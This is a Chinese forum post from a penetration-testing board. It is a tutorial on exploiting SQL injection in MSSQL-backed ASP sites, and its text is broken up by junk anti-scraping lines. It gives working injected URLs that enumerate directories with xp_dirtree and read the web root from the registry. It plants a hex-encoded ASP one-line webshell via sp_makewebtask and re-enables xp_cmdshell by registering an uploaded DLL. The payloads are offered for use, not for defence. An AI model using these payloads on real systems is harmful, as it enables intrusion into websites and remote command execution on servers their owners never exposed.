中国网络渗透测试联盟
标题:
MSsqlL注入取得网站路径最好的方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:20
标题:
MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
; e0 [; n4 n6 \0 [
假设我们在test里有两个文件夹test1和test2在test1里又有test3
+ P8 D; _ L6 O5 t5 ^
结果显示
+ W, q- @" G; [8 e* s
# }1 @; @- u ~7 u+ g: m
subdirectory depth
5 `5 J0 {! j# ^( O! C
test1 1
/ P+ W. T% e: f9 U9 A; ~
test3 2
2 I' T. ^' i( s
test2 1
# a/ v! i, ]$ ~" z0 T5 a
4 w) b3 l7 w _* O
哈哈发现没有那个depth就是目录的级数
1 x6 y ^! F2 r" o' e
ok了,知道怎么办了吧
& t6 Z) U0 ]& n$ Q) P4 R' B
5 X- g2 e. R1 @' O) Z
http://www.xxxxx.com/down/list.asp?id=1;create
table dirs(paths varchar(1000),id int)--
5 z. p2 D8 W7 U
http://www.xxxxx.com/down/list.asp?id=1;insert
dirs exec master.dbo.xp_dirtree 'd:\' --
& j3 ?& G1 J1 u+ z+ D
http://www.xxxxx.com/down/list.asp?id=1
and 0<>(select top 1 paths from dirs where id=1)-
" P$ J2 E- ~; O2 u# p, I0 A
. M- b1 h: f$ U- R) @9 H9 x/ I
只要加上id=1,就是第一级目录 。
+ p/ b. r& X- R0 v, e7 p$ g" Z+ o- P
& y1 Z" k" e8 i
/ Z& q, D( d. H4 k* a3 z1 U! h
通过注册表读网站路径:
* |/ `# _, W2 O" Y' J( y) ?
0 l+ d7 }% U7 Z
1.;create table [dbo].[cyfd] ([gyfd][char](255));
% I0 X: `: p/ f( X4 }- w
0 n+ ?2 m$ O! [/ u
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
4 n# e5 w8 ?* o+ f, J0 s5 j
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
0 j9 O+ c$ A7 G4 r" I0 X) ^ i5 E
# [* G. ]1 V2 |) D$ K
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
% M# e$ w/ H! A, R9 X9 m8 N( O
and 1=(select count(*) from cyfd where gyfd > 1)
$ j% p1 e; L j) R5 O$ E* o# y b, r
这样IE报错,就把刚才插进去的Web路径的值报出来了
$ d, Y, u$ l3 N3 `5 d6 U8 g8 Q( g
' n; e; I D: G4 `* l4 H/ C: O
4.drop table cyfd;-- 删除临时表
7 v: E* L. X4 q3 c
9 _4 e' k( w: s1 U/ |" @
获得webshell方法:
/ i; l+ U4 b/ C# z0 o
1.create table cmd (a image)-- \**cmd是创建的临时表
5 ?( J1 a6 v9 k* z
; v6 \' ~. x/ U3 ]
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
& m# |) O6 ~$ o/ B% |
% B. L E% r; V7 U. S6 ~) v5 M
1 W4 Z, n7 q# _( Y( [& f" X3 Q: I
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
" u' v& [" r4 U2 }7 ]) i
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
3 y. f/ u% `: j& I: S/ [1 E/ J
2 N8 T1 M+ J$ | e* r- z
4.drop table cmd;-- 删除cmd临时表
! l- @( b$ {# W9 H6 B6 I, r8 U" p
2 t+ V' ?$ Y3 e- j6 {7 k6 z
恢复xp_cmdshell方法之一:
& J- Z8 b5 ^* x
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
; \' t' l7 O7 B& f* o
http://www.something.com/script.asp?id=2;EXEC
master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
8 b. x: z( I! s/ _; r% @6 Z. l
恢复,支持绝对路径的恢复哦。:)
3 v+ U* J3 d( L& N2 ^7 Z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2